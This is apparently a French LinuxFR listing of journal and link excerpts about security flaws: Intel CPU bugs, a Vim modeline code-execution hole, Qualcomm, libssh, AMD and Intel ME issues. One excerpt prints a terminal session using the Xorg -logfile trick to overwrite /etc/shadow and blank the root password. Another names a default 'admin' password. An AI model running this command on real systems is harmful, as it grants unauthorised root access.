Lien failles intel en pagaille
Journal Linux Mint, Mate et grosse faille foireuse au niveau du verrouillage d´écran

J'ai trouvé ça tellement énorme que je vais vous relater l'aventure.
Un collègue a un laptop sous Linux Mint (ubuntu based il me semble) avec le bureau Mate. Aucune idée du desktop Manager. Tout à l'heure ont s´était posé ensemble dans une salle pour bosser sur un sujet commun [1]. On termine, il rabat l´écran de son laptop, qui vérouille la session, jusque là tout va bien. Arrivé à sa place de travail il redéploie l´écran, voit la mire l'invitant (…)
Journal [FAILLE] Code execution dans Vim via un fichier malicieux forgé
La vulnérabilité est tombée hier:
https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md
Il s'agit d'execution de code, possiblement distante (merci netcat) en exploitant une //faille// dans la gestion des modeline (Fonctionnalité qui permet de configurer vim pour le buffer courant, via une ligne spécialement formaté au début du fichier)
L'astuce intéressante est que, par l'utilisation de caractères d'échappement, l'attaquant peut même rendre la ligne malicieuse invisible via cat.
Des mitigations existent (désactiver les modelines), tout est détaillé sur la page.
Journal Réflexion d'un utilisateur de Firefox avec un processeur Intel en 2019

Bonjour nal,
Je ne peux m'empêcher de mettre en parallèle les gains ahurissants de performance de Firefox depuis un an (cf la dernière dépêche en date) avec la dégradation tout aussi ahurissante des performances Intel depuis un an.
Tandis que les développements du premier sont entièrement tendus vers les moyens d'accroître la vitesse et la réactivité du logiciel (en même temps que sa sécurité et de proposer des outils de défense de la vie privée aux utilisateurs) (…)
Journal Qualcomm corrige une faille critique dans des dizaines de puces Snapdragon
Pour continuer sur les discussions autour d'Android du moment sur LinuxFR.
Source : https://app.beebom.com/qualcomm-patches-critical-flaw-dozens-snapdragon-socs/
Traduction :
Des chercheurs du groupe NCC, une compagnie spécialisée dans la cybersécurité, ont découvert une vulnérabilité critique qui affecte des dizaines de puces Qualcomm utilisés dans les téléphones et tablettes Android.
D’après les rapports, pas moins de 46 puces Qualcomm, incluant les SD820, 835, 845, 855, 625, 636, 660, 670 sont probablement impactés par la vulnérabilité qui permet d’autoriser des attaquants potentiels à accéder à (…)
Lien Accès non autorisé à la base de données utilisateurs de Docker Hub (usernames, hashes, token)
Lien Vous avez aimé Meltdown et Spectre by Intel ! Vous allez adorer Spoiler by Intel !
Journal La faille grosse comme une maison

[Dev@localhost ~]$ id
uid=1000(Dev) gid=1000(Dev) groups=1000(Dev) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[Dev@localhost ~]$
[Dev@localhost ~]$ cd /etc
[Dev@localhost etc]$
[Dev@localhost etc]$ ls -la shadow----------. 1 root root 1241 Oct 10 01:15 shadow
[Dev@localhost etc]$
[Dev@localhost etc]$ cat shadowcat: shadow: Permission denied
[Dev@localhost etc]$
[Dev@localhost etc]$ Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1X.Org X Server 1.19.5
Release Date: 2017-10-12
X Protocol Version 11, Revision 0
Build Operating System: 3.10.0-693.17.1.el7.x86_64
Current Operating System: Linux localhost.localdomain 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 (…)
Journal demain soir on finit tard
Le CVE 2018-10933 concernant la libssh est limpide : demain on reporte tout à après demain et à la place on fait les mises à jour (si si, même pour toi le petit serveur du fond de la classe qui ne fait jamais ses mises à jour à cause de /place ici une mauvaise excuse/ )
bonjour server
bonjour
je voudrais avoir un accès
vous avez besoin d'un mot de passe, $user
mais je n'en ai aucun ! (…)
Lien Nethammer : Pas de trace. La recherche des cartes réseaux impactées commence ?
Lien Attention, utilisateurs de PGP : de nouvelles failles exigent une action immédiate de votre part
Lien 8 nouvelles failles semblables à Spectre, dont 4 majeures
Journal [~Signet] Failles de sécurité dans les CPU : AMD revient dans la course !

Les processeurs Ryzen/EPYC d'AMD (et leurs chipsets) ont aussi leurs failles de sécurité – il n'y a pas qu'Intel dans ce petit jeu. Ah, et les chipsets sont concernés aussi.
Ce qui est vraiment dommage, c'est qu'AMD avait beaucoup communiqué sur la sécurité de ses solutions au moment des failles Spectre et Meltdown…
Liens :
Billet sous licence CC-0.
Journal La bonne faille et la mauvaise faille
La bonne faille, le pirate il arrive, il l'exploite. La mauvaise faille, le pirate il arrive, il l'exploite aussi, mais c'est pas pareil! Après les failles terribles que sont Spectre et Meltdown, on voit poindre de nouveaux articles annonçant une nouvelle faille dans les processeurs intel.
Lors du démarrage des machines bénéficiant de Intel vPro, une combinaison de touche permet d'accéder au MEBx (Management Engine BIOS Extension). Le mot de passe par défaut, "admin", permet ensuite de contrôler la (…)